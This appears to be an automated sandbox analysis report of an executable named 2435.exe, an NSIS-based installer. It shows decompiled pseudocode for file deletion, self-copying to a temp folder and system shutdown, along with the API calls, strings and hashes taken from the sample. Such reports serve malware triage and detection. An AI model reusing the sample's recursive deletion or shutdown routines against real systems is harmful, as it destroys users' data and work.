									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									E00405B66("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x00403248
0x0040324c
0x00403254
0x00403256
0x0040325b
0x00403266
0x0040326d
0x00403275
0x0040327f
0x00403295
0x004032a5
0x004032aa
0x004032b0
0x004032b7
0x004032ca
0x004032cf
0x004032d1
0x004032d3
0x004032d8
0x004032d8
0x004032e8
0x004032ee
0x00403357
0x00403357
0x00403359
0x0040335b
0x00000000
0x00000000
0x004032f4
0x004032f7
0x004032ff
0x004032ff
0x00403302
0x00403307
0x00403309
0x00403309
0x0040330a
0x0040330a
0x0040330f
0x00403312
0x00403347
0x0040334c
0x00403351
0x00403354
0x00403356
0x00403356
0x00403356
0x00000000
0x00403314
0x00403314
0x00403315
0x00403318
0x00403320
0x00403323
0x00403325
0x00403325
0x00403325
0x00403323
0x00403328
0x0040332e
0x00403336
0x00403339
0x0040333b
0x0040333b
0x0040333b
0x00403339
0x0040333e
0x00403345
0x0040335f
0x00403362
0x0040336b
0x00403370
0x00403370
0x0040337b
0x00403381
0x00403386
0x00403388
0x004033aa
0x004033af
0x004033b6
0x004033bd
0x004033c1
0x00403428
0x00403428
0x0040342d
0x00403437
0x00403522
0x00403528
0x00403533
0x0040353c
0x0040353e
0x00403543
0x00403545
0x00403547
0x00403549
0x0040354b
0x0040354d
0x0040354f
0x0040355f
0x00403561
0x00403563
0x00403570
0x0040357f
0x00403587
0x0040358f
0x0040358f
0x00403563
0x0040354f
0x0040354b
0x00403594
0x0040359a
0x0040359c
0x004035a0
0x004035a0
0x0040359c
0x004035a5
0x004035aa
0x004035ad
0x004035af
0x004035af
0x004035b7
0x004035b7
0x00403446
0x0040344d
0x0040344d
0x004033c9
0x00403418
0x00403418
0x00403424
0x00000000
0x00403424
0x004033d2
0x004033df
0x004033d6
0x004033dc
0x00000000
0x00000000
0x004033de
0x004033de
0x004033de
0x004033e3
0x004033e5
0x004033ed
0x00403459
0x0040346d
0x00000000
0x00000000
0x00403471
0x00403478
0x0040347e
0x00403484
0x0040348c
0x0040348c
0x0040349a
0x004034a1
0x004034aa
0x004034b0
0x004034bc
0x004034c2
0x004034cc
0x004034e0
0x004034e1
0x004034e2
0x004034f3
0x004034f9
0x00403500
0x00403503
0x00403509
0x00403509
0x00403500
0x0040350d
0x00403513
0x00403513
0x00403516
0x00403517
0x00403518
0x00000000
0x00403518
0x004033ef
0x004033f1
0x004033fc
0x00000000
0x00000000
0x00403404
0x0040340f
0x00403414
0x00000000
0x00403414
0x00403390
0x0040339c
0x004033a1
0x004033a6
0x004033a8
0x00000000
0x00000000
0x00000000
0x004033a8
0x00000000
0x00403345
0x00000000
0x00000000
0x00000000
0x004032f9
0x004032f9
0x004032f9
0x004032fa
0x004032fa
0x00000000
0x004032f9
0x00000000

APIs

#17.COMCTL32 ref: 0040325B
SetErrorMode.KERNELBASE(00008001), ref: 00403266
OleInitialize.OLE32(00000000), ref: 0040326D

Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6

SHGetFileInfoA.SHELL32(0041F458,00000000,?,00000160,00000000,00000008), ref: 00403295

Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73

GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\2435.exe" ,00000000), ref: 004032BD
CharNextA.USER32(00000000,"C:\Users\user\Desktop\2435.exe" ,00000020), ref: 004032E8
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
DeleteFileA.KERNELBASE(1033), ref: 004033AF
OleUninitialize.OLE32(00000000), ref: 0040342D
ExitProcess.KERNEL32 ref: 0040344D
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\2435.exe" ,00000000,00000000), ref: 00403459
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\2435.exe" ,00000000,00000000), ref: 00403465
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
CopyFileA.KERNEL32(C:\Users\user\Desktop\2435.exe,0041F058,00000001), ref: 004034D6
CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
ExitWindowsEx.USER32 ref: 00403594
ExitProcess.KERNEL32 ref: 004035B7

Strings

\Temp, xrefs: 00403396
1033, xrefs: 004033AA
C:\Users\user\Desktop, xrefs: 0040345E, 00403463, 00403486
Error launching installer, xrefs: 004033E5
", xrefs: 0040330A
SeShutdownPrivilege, xrefs: 0040356A
C:\Users\user\AppData\Local\Temp\, xrefs: 00403370, 00403375, 0040338F, 0040339B, 00403458, 00403464, 00403470, 00403477, 00403517
/D=, xrefs: 0040333E
C:\Users\user\AppData\Local\Temp, xrefs: 0040340A
"C:\Users\user\Desktop\2435.exe" , xrefs: 004032B0, 004032B6, 004033CC
C:\Users\user\AppData\Local\Temp, xrefs: 00403366, 004033FF, 0040347E, 00403487
~nsu.tmp, xrefs: 00403453
NSIS Error, xrefs: 0040329B
_?=, xrefs: 004033D6
C:\Users\user\Desktop\2435.exe, xrefs: 004034D1
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040324C
NCRC, xrefs: 00403328

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\2435.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\2435.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2278157092-3844421234
Opcode ID: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
Opcode Fuzzy Hash: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040573A(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B66(0x4214a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056A0(_t72);
					} else {
						lstrcatA(0x4214a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B66(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404F04(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E61(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t72);
							E0040581E(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405496
0x0040549a
0x004054a3
0x004054a6
0x004054a9
0x004054b1
0x004054b3
0x004054b4
0x00000000
0x004054b4
0x004054c3
0x004054c3
0x004054c6
0x004054c9
0x004054dd
0x004054e4
0x004054e9
0x004054eb
0x004054fb
0x004054ed
0x004054f3
0x004054f3
0x00405500
0x00405503
0x0040550e
0x00405514
0x00405519
0x00405529
0x0040552b
0x00405531
0x00405534
0x00405537
0x004055f4
0x004055f4
0x004055f8
0x004055fa
0x004055fa
0x004055fa
0x004055fa
0x00000000
0x00000000
0x00000000
0x00000000
0x0040553d
0x0040553d
0x00405546
0x0040554c
0x00405551
0x00405554
0x00405556
0x0040555a
0x0040555c
0x0040555c
0x0040555a
0x0040555f
0x00405562
0x00405575
0x00405577
0x0040557c
0x00405583
0x0040559b
0x004055a1
0x004055a7
0x004055a9
0x004055ce
0x004055ab
0x004055ab
0x004055af
0x004055c3
0x004055b1
0x004055b4
0x004055b9
0x004055bb
0x004055bc
0x004055bc
0x004055af
0x00405585
0x0040558b
0x0040558d
0x00405593
0x00405593
0x0040558d
0x00000000
0x00405583
0x00405564
0x00405567
0x00405569
0x00000000
0x00000000
0x0040556b
0x0040556d
0x00000000
0x00000000
0x0040556f
0x00405573
0x00000000
0x00000000
0x00000000
0x004055d3
0x004055dd
0x004055e3
0x004055e3
0x004055ee
0x00000000
0x004055ee
0x00405505
0x0040550c
0x00000000
0x00000000
0x00000000
0x004054cb
0x004054cb
0x004054cd
0x004055fe
0x00405601
0x00405604
0x00405656
0x00405656
0x00405656
0x00405606
0x00405609
0x00405614
0x00405619
0x0040561b
0x00000000
0x00000000
0x0040561e
0x00405624
0x0040562a
0x00405630
0x00405632
0x00000000
0x0040564e
0x00405634
0x00405638
0x00000000
0x00000000
0x0040563d
0x00405642
0x00405643
0x00000000
0x00405644
0x0040560b
0x0040560b
0x00000000
0x0040560b
0x004054d3
0x004054d7
0x00000000
0x00000000
0x00000000
0x004054d7

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\2435.exe" ,7519F560), ref: 004054A9
lstrcatA.KERNEL32(004214A8,\*.*,004214A8,?,00000000,?,"C:\Users\user\Desktop\2435.exe" ,7519F560), ref: 004054F3
lstrcatA.KERNEL32(?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\2435.exe" ,7519F560), ref: 00405514
lstrlenA.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\2435.exe" ,7519F560), ref: 0040551A
FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\2435.exe" ,7519F560), ref: 0040552B
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
FindClose.KERNEL32(?), ref: 004055EE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
"C:\Users\user\Desktop\2435.exe" , xrefs: 00405495
\*.*, xrefs: 004054ED

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\2435.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-433319332
Opcode ID: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
Opcode Fuzzy Hash: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 73351A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E73351A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E73351215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E73351215();
				_t320 = E7335123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E733512FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E73351534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x73352259) & 0x000000ff) * 4 +  &M733521CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E73351224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E73351215();
											 &_v12 = E73351A36( &_v12);
											__eax = E73351429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73351A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73351A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7335305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73351A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
